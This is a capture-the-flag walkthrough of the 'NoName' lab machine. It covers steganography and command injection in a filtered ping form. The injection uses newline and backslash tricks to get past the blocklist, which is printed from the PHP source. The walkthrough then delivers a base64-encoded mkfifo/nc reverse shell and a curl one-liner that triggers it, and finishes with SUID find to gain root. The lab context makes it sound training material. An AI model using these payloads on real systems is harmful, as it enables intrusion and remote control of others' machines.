[Offensive Security] Proving Grounds - NoName
https://portal.offensive-security.com/proving-grounds/play https://www.vulnhub.com/entry/haclabs-no_name,429/
NoName may appear easy, but not everything is always straightforward. Only
local.txt
andproof.txt
are valid flags.
Footprinting
Open ports
Nmap SYN scan:
kali@kali:~$ sudo nmap -sS -p- -Pn -v10 -oA syn_full 192.168.207.15
Discovered open port 80/tcp on 192.168.207.15
NSE scan:
kali@kali:~$ sudo nmap -sC -sV -p80 -Pn -v10 -oA nse 192.168.207.15
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
HTTP
In the main web page, there is a form which requires an IP:
>>>
POST /index.php HTTP/1.1
Host: 192.168.207.15
box=fake+query&submitt=submit
<<<
<h4>Fake Admin Area</h4>
<form action="index.php" method="post">
<input type="text" placeholder="fake query" name="box">
<input type="submit" placeholder="Run" value="submit" name="submitt">
</form>
Fake ping executed
However, that is a fake query box, as the IP input is not processed. Enumeration using ffuf
reveals an admin
directory:
kali@kali:~$ ffuf -v -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.207.15/FUZZ -t 50 -fc 404,403 -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
"http://192.168.207.15/
"http://192.168.207.15/"
"http://192.168.207.15/."
"http://192.168.207.15/admin"
"http://192.168.207.15/index.php"
This resource contains 4 images, with no sensitive information:
kali@kali:~$ wget -r http://192.168.207.15/admin
kali@kali:~$ ls ./192.168.207.15
ctf-01.jpg haclabs.jpeg new.jpg Short.png
kali@kali:~$ exiftool ./192.168.207.15/*
Steganographic message
Looking closer at that admin
page, a password is hidden at the very bottom response !
>>>
GET /admin HTTP/1.1
Host: 192.168.207.15
<<<
<html>
<body style="background-color:Gainsboro;text-align:center">
<h3 text-align:center>HacLabs directory of gallery.</h3>
<img src="new.jpg" height="200" width="200">
<br>
<img src="ctf-01.jpg" height="200" width="200">
<br>
<img src="haclabs.jpeg" height="200" width="200">
<br>
<img src="Short.png" height="200" width="200">
</body>
</html>
[...]
<!--passphrase:harder-->
But what I can do with that passphrase ? Is there any hidden file in one of the images ?
kali@kali:~$ steghide extract -sf haclabs.jpeg
Enter passphrase:
wrote extracted data to "imp.txt".
Yup !
kali@kali:~$ cat imp.txt
c3VwZXJhZG1pbi5waHA=
kali@kali:~$ base64 -d imp.txt
superadmin.php
This superadmin.php
contains a ping
feature (which is real this time!):
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=127.0.0.1&submitt=Submit+Query
<<<
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.015 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.029 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.027 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2030ms
rtt min/avg/max/mdev = 0.015/0.023/0.029/0.008 ms
OS Command Injection
This output is the same as in a standard shell:
kali@kali:~$ ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.013 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.038 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.060 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2036ms
rtt min/avg/max/mdev = 0.013/0.037/0.060/0.019 ms
I immediately found a blind command injection using the pipe symbol:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=|sleep+10&submitt=Submit+Query
<<<
[10,452millis]
Note that the injection doesn't need to be blind, as the output is returned in the response:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=|id&submitt=Submit+Query
<<<
uid=33(www-data) gid=33(www-data) groups=33(www-data)
See the query form in
index.php
was a rabbit hole, as the user's input isn't processed:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0acat+index.php&submitt=Submit+Query
<<<
<?php
if (isset($_POST['submitt']))
{
echo "Fake ping executed";
}
?>
But we can't reverse shell as easily, as some characters are filtered, such as nc
, or &
(URL-encoded %26
):
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0asleep+2%26&submitt=Submit+Query
<<<
[14millis]
Note that a Line Feed (
\n
URL-encoded%0a
) can also be used to inject the next command.
Here, the injected command was not executed as the response came in less than 2 seconds (i.e. 0.014s). In fact, the source code shows that the filtered patterns are inarray(";", "&&", "/", "bin", "&", " &&", "ls", "nc", "dir", "pwd")
:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0acat+superadmin.php&submitt=Submit+Query
<<<
<?php
if (isset($_POST['submitt']))
{
$word=array(";","&&","/","bin","&"," &&","ls","nc","dir","pwd");
$pinged=$_POST['pinger'];
$newStr = str_replace($word, "", $pinged);
if(strcmp($pinged, $newStr) == 0)
{
$flag=1;
}
else
{
$flag=0;
}
}
if ($flag==1){
$outer=shell_exec("ping -c 3 $pinged");
echo "<pre>$outer</pre>";
}
?>
Having a reverse shell with nc
seems tougher than it sounds, but some bypasses exist !
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0al\s%0a&submitt=Submit+Query
<<<
Short.png
admin
ctf-01.jpg
haclabs.jpeg
index.php
new.jpg
superadmin.php
Indeed, nc
could be obfuscated as n\c
, and bypass the filter:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0ash|n\c++192.168.49.207+48590&submitt=Submit+Query
<<<
$ nc -nvlp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38142
Arf ! No command is being executed...
$ nc -nvlp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38144
id
ls
whoami
echo plz
After lots of trials and errors, I realized the following payload worked:
$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.207 48590 >/tmp/f' |base64
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu
NDkuMjA3IDQ4NTkwID4vdG1wL2YK
Note that the base64-encoded command contains a new line, which should be URL-encoded to %0a
:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0aecho 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu%0aNDkuMjA3IDQ4NTkwID4vdG1wL2YK'|base64 -d|sh&submitt=Submit+Query
<<<
$ nc -nlvp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38194
sh: 0: can't access tty; job control turned off
$ whoami
www-data
A one-liner reverse shell could be:
$ curl -X POST -d "pinger=%0aecho 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu%0aNDkuMjA3IDQ4NTkwID4vdG1wL2YK'|base64 -d|sh&submitt=Submit+Query" http://192.168.207.15/superadmin.php
Local privilege escalation
local.txt
The users are:
$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
haclabs:x:1000:1000:haclabs,,,:/home/haclabs:/bin/bash
yash:x:1001:1001:,,,:/home/yash:/bin/bash
The first flag is in yash
's directory:
$ cd /home/yash
$ ls
flag1.txt
local.txt
$ cat *
Due to some security issues,I have saved haclabs password in a hidden file.
95[...]e6
proof.txt
Let's search, given the above sentence, the haclabs
's password:
Due to some security issues,I have saved haclabs password in a hidden file.
Well, nothing interesting in his folder:
$ cd /home/haclabs
$ ls -la
total 80
drwxr-xr-x 16 haclabs haclabs 4096 Mar 16 2020 .
drwxr-xr-x 4 root root 4096 Jan 27 2020 ..
-rw------- 1 haclabs haclabs 2576 Jan 30 2020 .ICEauthority
-rw-r--r-- 1 root root 0 Mar 16 2020 .bash_history
-rw-r--r-- 1 haclabs haclabs 3771 Jan 27 2020 .bashrc
drwx------ 13 haclabs haclabs 4096 Feb 9 2020 .cache
drwx------ 11 haclabs haclabs 4096 Jan 27 2020 .config
drwx------ 3 haclabs haclabs 4096 Jan 27 2020 .gnupg
drwx------ 3 haclabs haclabs 4096 Jan 27 2020 .local
drwx------ 5 haclabs haclabs 4096 Jan 27 2020 .mozilla
-rw-r--r-- 1 haclabs haclabs 807 Jan 27 2020 .profile
drwx------ 2 haclabs haclabs 4096 Jan 27 2020 .ssh
-rw-r--r-- 1 haclabs haclabs 0 Jan 27 2020 .sudo_as_admin_successful
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Desktop
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Documents
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Downloads
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Music
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Pictures
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Public
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Templates
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Videos
-rw-r--r-- 1 root root 152 Jan 30 2020 flag2.txt
Is there anything interesting inflag2.txt
?
$ cat flag2.txt
I am flag2
--------------- ----------------
--------
Nope :/ Using linpeas
, I realized searching for haclabs
's password was a rabbit hole. Indeed, I forgot to look for root
SUIDs !
╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 233K Nov 5 2017 /usr/bin/find
Exploiting that find
command, here we get the root
flag:
$ find . -exec /bin/sh -p \; -quit
$ id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
$ ls /root
flag3.txt
proof.txt
$ cat /root/*
Your flag is in another file...
41[...]51